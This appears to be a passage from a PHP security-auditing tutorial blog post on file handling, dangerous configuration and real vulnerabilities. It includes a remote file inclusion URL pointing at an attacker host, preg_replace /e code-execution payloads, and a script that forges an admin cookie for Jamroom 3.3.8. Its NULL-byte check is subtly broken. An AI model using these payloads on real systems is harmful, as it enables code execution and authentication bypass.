Applications should not allow arbitrary HTTP Location redirects, since these can be used for phishing attacks. In addition, open redirects can have a negative impact on the cross domain policy infrastructure of Adobe‘s Flash Player.

E)Secure File Handling:

• Detect and replace NULL bytes:

1
2
3
4
5
<?php
if (strpos($_GET["f"], "\0") === true) {
$file = str_replace("\0", "", $_GET["f"]);
}
?>

• Prevent remote file inclusion (path prefix) and directory traversal (basename):

1
2
3
<?php
$file = "./".basename($_GET["f"]). ".php";
?>

• Include only whitelisted files:

1
2
3
4
5
<?php
if (in_array($_GET['action'], array('index', 'logout'))) {
include './'.$_GET['action'] . '.php';
} else die('action not permitted');
?>

3) Configuration point :
last point . weakness in Programing (Source code) Structure . one of the most celever part in source Code Auditing .
we sea these Fllowing Configuration in code or PHP.ini Setting :
[a]- when Server don’t Disabling Remote URLs for File Handling Functions
File handling functions like fopen, file_get_contents, and include accept URLs as file parameters (for example: fopen(‘http://www.example.com/’, ‘r’)). Even though this enables developers to access remote resources like HTTP URLs, it poses as a huge security risk if the filename is taken from user input without proper sanitization, and opens the door for remote code execution on the server.

[b] Register Globals is ‘ON’ :

Prior to version 4.2.0, PHP used to provide input values as global variables. This feature was named register_globals, and it was responsible for many security issues in web applications because it allowed attackers to freely manipulate global variables in many situations. Fortunately it’s disabled by default from PHP 4.2.0 and on, because it’s dangerous on so many scales.

1
2
3
4
5
6
<?php
if (ereg("test.php", $PHP_SELF)==true)
{
    include $server_inc."/step_one_tables.php";
}
?>

demonstration :
http://path/inc/step_two_tables.php?server_inc=http://attacker/js_functions.php

[c] Server Don’t Limit Access to Certain File Name Patterns :

Many file extensions should not be accessible by end users. Take for example .inc. Some developers prefer to assign this extension to included scripts. The problem here is that this extension isn’t parsed by the PHP engine, and as a result, anyone can view the source code by requesting the file itself: http://www.example.com/includes/settings.inc

Such files may contain sensitive data like MySQL passwords. So you need to ensure that end users can not access those files. Other candidate extensions are .sql, .mysql, and .pgsql.

Another pattern to look out for is backup files. Some editors create backup versions of edited files in the same directory where the original file is located. For example, if you edit index.php, a backup called index.php~ will be created. Given that this file doesn’t end with .php, it will not be processed by the PHP engine, and its code will also be available to users by requesting http://www.example.com/index.php~

[d] Error Messages and Logging is ON :

By default, PHP prints error messages to the browser’s output. While this is desirable during the development process, it may reveal security information to users, like installation paths or usernames.
.
And many other attacks, usually design by the programmer !


Real Word Example :

Exp 1 : PHP Code Execution:
There is an arbitrary php code execution issuedue to the unsafe use of preg_replace evaluation when parsing anchor tags and the like.

1
2
3
4
5
6
7
<?php
// Replace any usernames
$ret = preg_replace("#\[:nom:([^\]]*)\]#e",
	            "username(0, trim(\"\\1\"))",
	             $ret);
 
?>

php code execution is possible via complex variable evaluation.
[:nom:{${phpinfo()}}]

or this code :

1
2
3
4
5
6
7
8
9
10
11
<?php
if($globals['bbc_email']){
 
	$text = preg_replace(
				array("/\[email=(.*?)\](.*?)\[\/email\]/ies",
						"/\[email\](.*?)\[\/email\]/ies"),
				array('check_email("$1", "$2")',
						'check_email("$1", "$1")'), $text);
 
}
?>

abuse :
[email]{${phpinfo()}}[/email]

2- Configuration mistake : Authentication Bypass
There is a serious flaw in the Jamroom (JamRoom <= 3.3.8) authentication mechanism that allows for an attacker to completely bypass the authentication process with a specially crafted cookie. The vulnerable code in question can be found in /includes/jamroom-misc.inc.php @ lines 3667-3681 within the jrCookie() function

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
list($user,$hash) = unserialize(stripslashes($_val));
$user = trim(genc('get',$user));
$req = "SELECT user_nickname, user_password
FROM {$jamroom_db['user']}
WHERE user_nickname = '". dbEscapeString($user) ."'
LIMIT 1";
$_rt = dbQuery($req,'SINGLE');
if (strlen($_rt['user_password']) === 0) {
return(false);
}
if (md5($_rt['user_password'] . $sect) == $hash) {
print_r($rt);
return($_rt);
}
?>

The problem with the above code is that $_val is a user supplied value taken from $_COOKIE['JMU_Cookie']. Since the cookie data is serialized an attacker can specify data types such as boolean values, and bypass the password check, and authenticate with only a username. If the first byte of the password hash stored in the database is numerical then a boolean value of true can be used in place of an actual password, and if the first byte is a letter then a boolean value of false is required.

1
2
3
4
5
6
7
8
9
10
11
12
<?php
$data = array();
$user = 'admin'; // Target
 
$data[0] = base64_encode(serialize($user));
$data[1] = (bool)0;
echo "\n\n===[ 0 ] ========================\n\n";
echo 'Cookie: JMU_Cookie=' . urlencode(serialize($data));
$data[1] = (bool)1;
echo "\n\n===[ 1 ] ========================\n\n";
echo 'Cookie: JMU_Cookie=' . urlencode(serialize($data));
?>

The above script is an example of how it works, and will create a cookie to login as the user admin. For more information check out the comparison operators section of the php manual. Specifically the “identical” operator.

3- new bug :
http://www.sektioneins.com/en/advisories/advisory-022009-phpids-unserialize-vulnerability/index.html
in other post , i will publish some of our most recent research on browsers security and results we got on this topic as i promised in a few past posts .

regards
daphne

Categories


Get Adobe Flash player